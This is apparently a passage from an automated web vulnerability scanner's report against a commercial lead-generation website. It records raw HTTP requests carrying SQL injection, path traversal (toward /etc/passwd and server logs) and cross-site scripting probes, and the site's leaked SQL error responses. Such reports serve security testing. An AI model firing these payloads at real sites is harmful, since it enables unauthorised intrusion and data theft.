OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:55 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=g2ektgqg6f8aqv4u2pbescqi63; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/inco00/project.php

/ppc/leadflow/inco00/project.php

http://www.insideup.com/ppc/leadflow/inco00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/inco00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:33 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qei7ktqh0ftp7m3fhbsd54db26; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/phsy00/project.php

/ppc/leadflow/phsy00/project.php

http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId=110009&iusrc='%2B%20(select+convert(in..

Parameters

Parameter Type Value
catId GET 110009
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/phsy00/project.php?catId=110009&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=add482e3u38tj137540fr8snd4; path=/
Content-Length: 4153
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select 